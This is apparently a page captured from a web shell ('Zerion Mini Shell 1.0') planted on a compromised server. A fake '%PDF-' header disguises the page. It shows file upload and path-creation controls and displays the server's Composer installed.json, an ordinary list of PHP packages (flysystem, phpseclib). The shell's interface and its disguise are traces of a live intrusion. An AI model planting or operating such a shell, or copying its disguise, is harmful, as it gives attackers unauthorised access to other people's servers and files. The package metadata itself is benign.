%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /var/www/vendor/composer/
Upload File :
Create Path :
Current File : /var/www/vendor/composer/installed.json

[
    {
        "name": "league/flysystem",
        "version": "2.5.0",
        "version_normalized": "2.5.0.0",
        "source": {
            "type": "git",
            "url": "https://github.com/thephpleague/flysystem.git",
            "reference": "8aaffb653c5777781b0f7f69a5d937baf7ab6cdb"
        },
        "dist": {
            "type": "zip",
            "url": "https://api.github.com/repos/thephpleague/flysystem/zipball/8aaffb653c5777781b0f7f69a5d937baf7ab6cdb",
            "reference": "8aaffb653c5777781b0f7f69a5d937baf7ab6cdb",
            "shasum": ""
        },
        "require": {
            "ext-json": "*",
            "league/mime-type-detection": "^1.0.0",
            "php": "^7.2 || ^8.0"
        },
        "conflict": {
            "guzzlehttp/ringphp": "<1.1.1"
        },
        "require-dev": {
            "async-aws/s3": "^1.5",
            "async-aws/simple-s3": "^1.0",
            "aws/aws-sdk-php": "^3.132.4",
            "composer/semver": "^3.0",
            "ext-fileinfo": "*",
            "ext-ftp": "*",
            "friendsofphp/php-cs-fixer": "^3.2",
            "google/cloud-storage": "^1.23",
            "phpseclib/phpseclib": "^2.0",
            "phpstan/phpstan": "^0.12.26",
            "phpunit/phpunit": "^8.5 || ^9.4",
            "sabre/dav": "^4.1"
        },
        "time": "2022-09-17T21:02:32+00:00",
        "type": "library",
        "installation-source": "dist",
        "autoload": {
            "psr-4": {
                "League\\Flysystem\\": "src"
            }
        },
        "notification-url": "https://packagist.org/downloads/",
        "license": [
            "MIT"
        ],
        "authors": [
            {
                "name": "Frank de Jonge",
                "email": "info@frankdejonge.nl"
            }
        ],
        "description": "File storage abstraction for PHP",
        "keywords": [
            "WebDAV",
            "aws",
            "cloud",
            "file",
            "files",
            "filesystem",
            "filesystems",
            "ftp",
            "s3",
            "sftp",
            "storage"
        ]
    },
    {
        "name": "league/flysystem-sftp",
        "version": "2.5.0",
        "version_normalized": "2.5.0.0",
        "source": {
            "type": "git",
            "url": "https://github.com/thephpleague/flysystem-sftp.git",
            "reference": "e30acbc9be024bb7df6ee4b159f2c8db3efcb6a7"
        },
        "dist": {
            "type": "zip",
            "url": "https://api.github.com/repos/thephpleague/flysystem-sftp/zipball/e30acbc9be024bb7df6ee4b159f2c8db3efcb6a7",
            "reference": "e30acbc9be024bb7df6ee4b159f2c8db3efcb6a7",
            "shasum": ""
        },
        "require": {
            "league/flysystem": "^2.0.0",
            "league/mime-type-detection": "^1.0.0",
            "php": "^7.2 || ^8.0",
            "phpseclib/phpseclib": "^2.0"
        },
        "time": "2022-04-27T17:27:27+00:00",
        "type": "library",
        "installation-source": "dist",
        "autoload": {
            "psr-4": {
                "League\\Flysystem\\PhpseclibV2\\": ""
            }
        },
        "notification-url": "https://packagist.org/downloads/",
        "license": [
            "MIT"
        ],
        "authors": [
            {
                "name": "Frank de Jonge",
                "email": "info@frankdejonge.nl"
            }
        ],
        "description": "SFTP filesystem adapter for Flysystem.",
        "keywords": [
            "Flysystem",
            "file",
            "files",
            "filesystem",
            "sftp"
        ],
        "abandoned": "league/flysystem-sftp-v3"
    },
    {
        "name": "league/mime-type-detection",
        "version": "1.11.0",
        "version_normalized": "1.11.0.0",
        "source": {
            "type": "git",
            "url": "https://github.com/thephpleague/mime-type-detection.git",
            "reference": "ff6248ea87a9f116e78edd6002e39e5128a0d4dd"
        },
        "dist": {
            "type": "zip",
            "url": "https://api.github.com/repos/thephpleague/mime-type-detection/zipball/ff6248ea87a9f116e78edd6002e39e5128a0d4dd",
            "reference": "ff6248ea87a9f116e78edd6002e39e5128a0d4dd",
            "shasum": ""
        },
        "require": {
            "ext-fileinfo": "*",
            "php": "^7.2 || ^8.0"
        },
        "require-dev": {
            "friendsofphp/php-cs-fixer": "^3.2",
            "phpstan/phpstan": "^0.12.68",
            "phpunit/phpunit": "^8.5.8 || ^9.3"
        },
        "time": "2022-04-17T13:12:02+00:00",
        "type": "library",
        "installation-source": "dist",
        "autoload": {
            "psr-4": {
                "League\\MimeTypeDetection\\": "src"
            }
        },
        "notification-url": "https://packagist.org/downloads/",
        "license": [
            "MIT"
        ],
        "authors": [
            {
                "name": "Frank de Jonge",
                "email": "info@frankdejonge.nl"
            }
        ],
        "description": "Mime-type detection for Flysystem"
    },
    {
        "name": "phpseclib/phpseclib",
        "version": "2.0.44",
        "version_normalized": "2.0.44.0",
        "source": {
            "type": "git",
            "url": "https://github.com/phpseclib/phpseclib.git",
            "reference": "149f608243f8133c61926aae26ce67d2b22b37e5"
        },
        "dist": {
            "type": "zip",
            "url": "https://api.github.com/repos/phpseclib/phpseclib/zipball/149f608243f8133c61926aae26ce67d2b22b37e5",
            "reference": "149f608243f8133c61926aae26ce67d2b22b37e5",
            "shasum": ""
        },
        "require": {
            "php": ">=5.3.3"
        },
        "require-dev": {
            "phing/phing": "~2.7",
            "phpunit/phpunit": "^4.8.35|^5.7|^6.0|^9.4",
            "squizlabs/php_codesniffer": "~2.0"
        },
        "suggest": {
            "ext-gmp": "Install the GMP (GNU Multiple Precision) extension in order to speed up arbitrary precision integer arithmetic operations.",
            "ext-libsodium": "SSH2/SFTP can make use of some algorithms provided by the libsodium-php extension.",
            "ext-mcrypt": "Install the Mcrypt extension in order to speed up a few other cryptographic operations.",
            "ext-openssl": "Install the OpenSSL extension in order to speed up a wide variety of cryptographic operations.",
            "ext-xml": "Install the XML extension to load XML formatted public keys."
        },
        "time": "2023-06-13T08:41:47+00:00",
        "type": "library",
        "installation-source": "dist",
        "autoload": {
            "files": [
                "phpseclib/bootstrap.php"
            ],
            "psr-4": {
                "phpseclib\\": "phpseclib/"
            }
        },
        "notification-url": "https://packagist.org/downloads/",
        "license": [
            "MIT"
        ],
        "authors": [
            {
                "name": "Jim Wigginton",
                "email": "terrafrost@php.net",
                "role": "Lead Developer"
            },
            {
                "name": "Patrick Monnerat",
                "email": "pm@datasphere.ch",
                "role": "Developer"
            },
            {
                "name": "Andreas Fischer",
                "email": "bantu@phpbb.com",
                "role": "Developer"
            },
            {
                "name": "Hans-Jürgen Petrich",
                "email": "petrich@tronic-media.com",
                "role": "Developer"
            },
            {
                "name": "Graham Campbell",
                "email": "graham@alt-three.com",
                "role": "Developer"
            }
        ],
        "description": "PHP Secure Communications Library - Pure-PHP implementations of RSA, AES, SSH2, SFTP, X.509 etc.",
        "homepage": "http://phpseclib.sourceforge.net",
        "keywords": [
            "BigInteger",
            "aes",
            "asn.1",
            "asn1",
            "blowfish",
            "crypto",
            "cryptography",
            "encryption",
            "rsa",
            "security",
            "sftp",
            "signature",
            "signing",
            "ssh",
            "twofish",
            "x.509",
            "x509"
        ]
    }
]

Zerion Mini Shell 1.0